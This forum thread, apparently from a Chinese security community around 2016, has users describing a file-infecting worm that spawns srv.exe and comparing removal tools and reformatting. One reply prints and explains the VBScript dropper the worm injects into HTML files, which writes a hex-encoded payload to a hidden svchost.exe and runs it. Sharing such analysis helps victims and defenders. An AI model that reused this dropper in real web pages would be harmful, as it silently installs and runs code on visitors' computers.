对srv.exe蠕虫病毒的个人分析(大神勿喷)

孤傲

以下所说的仅为个人观点，因为我中的就是这种病毒

特征:文件运行后，同目录下会出现一个原名 srv.exe的文件

对于这病毒，我电脑到现在还存在着，很是丧心病狂啊，被迫的研究了一下。。最后来个总结吧，仅代表我中的那个srv病毒

病毒劫持/改写系统某文件，首先对运行中的文件进行感染，然后搜索磁盘文件进行感染，这里得说一下特征，被感染的文件通常运行后都会出现一个源文件名 sev.exe的可执行文件，很奇怪的是，这文件并没有被占用，可以直接删除…
然后检测了一下它的运行轨迹，基本可以这样判断了，首先，病毒携带者(中了病毒的文件)一旦被打开，释放了病毒文件后，检测系统是否已经中了这种病毒，是的话，不会再次感染，一旦没有，将会进行感染，然后你的系统里面所有的可执行文件就会变成病毒母体，等待传播到下一个电脑的时候就会再次爆发，然后无限循环，丧心病狂啊，病毒的目的我无从得知，一些杀毒软件的确能KO掉它，没错是这样的，但问题来了，重点在下面

1.压缩文件
2.加密后的不可执行文件
3.一些安装包里面的文件
4.........
很多很多的文件类型，杀毒软件也是束手无策
然后我们还得面对后面的变种，升级等问题………

各位游客们，我们很抱歉的通知您，由于作死的笔者脑子短路并堵塞，暂无解决方案，请各位游客谅解。
(作死的我已经付出了沉重的代价(一怒之下全盘低格)才清除了这丧心病狂的病毒，并且我把所有软件先在虚拟机运行一遍才敢用……一朝被蛇咬十年怕井绳啊……)

鬼狐

不止这样它还会修改HTML类型的文件进行下一个文件的感染代码如下

[PHP] 纯文本查看 复制代码

DropFileName = "svchost.exe"
WriteData = "XXXXX"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

从上代码看来创建一个svchost.exe文件，然后把WriteData中包含的一段16进制字符串转为16进制代码并写入文件中，最后执行这个文件。
从而达到HTML感染其它文件的目的。
但是现在360能成功扫描出而且已经有专杀了

eric007007

随风潜入 发表于 2016-9-7 21:07
360也杀不掉吗，不是说360对所有有点异常的都杀吗。。。。

360是连带主体一起删掉，有一个专杀不是诺顿那个，国产的一个小专杀，很好用，在安全模式下全盘扫，大概需要4小时左右，然后可以坚持一段时间干净，过些日子，你打开一个硬盘不常打开的exe软件，就有出现SRV，然后疯狂的又要来一次，我是把c盘里有个C:\Program Files\Microsoft\desktopxxx.EXE直接创建个空白TXT然后重命名同名EXE，保存只读，抗了一段时间，但依然会爆发，每次爆发就安全模式下用小专杀软件扫描，烦死了，用杀毒软件直接把主体的EXE和病毒的srv.exe一起删除，我是头大的要炸，很多古老的收藏老游戏好的绿色好软件全部毁于一旦

万一行了呢

这个意思是除了格，杀不掉？

52pojieYiHui

诺顿的专杀对于我这种安装了固态一类的用户还是很快的

无情绝恋

52pojieYiHui 发表于 2016-9-6 20:10
诺顿的专杀对于我这种安装了固态一类的用户还是很快的

就算可以杀掉，也不可能是全部吧，毕竟科技就这么牛逼。

晓贤

格C盘装系统了用杀软全盘扫描

陈而戈

已有专杀~~ 图标是个小锤子

macrokk

对，我之前也是遇到过，因为有一次是设计一个页面，突然发现html被自动加上了一段奇怪的代码，然后所有的html文件都被加上了。，后来，格C盘，重装，然后装了一个最坑爹的3某0，全盘扫，好多自己的小软件也被杀了。。然后就没有然后了

梦碎

有专杀软件不过。杀完有点异常。 win10 SRV不会全盘感染会对你打开的那个软件出现SRV.exe